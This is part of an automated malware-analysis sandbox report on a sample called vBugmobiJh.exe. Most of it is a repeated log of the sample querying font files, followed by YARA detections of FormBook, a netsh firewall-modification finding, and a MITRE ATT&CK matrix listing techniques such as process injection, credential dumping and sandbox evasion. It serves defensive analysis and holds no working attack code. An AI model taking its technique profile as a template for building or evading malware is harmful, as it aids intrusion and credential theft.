          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
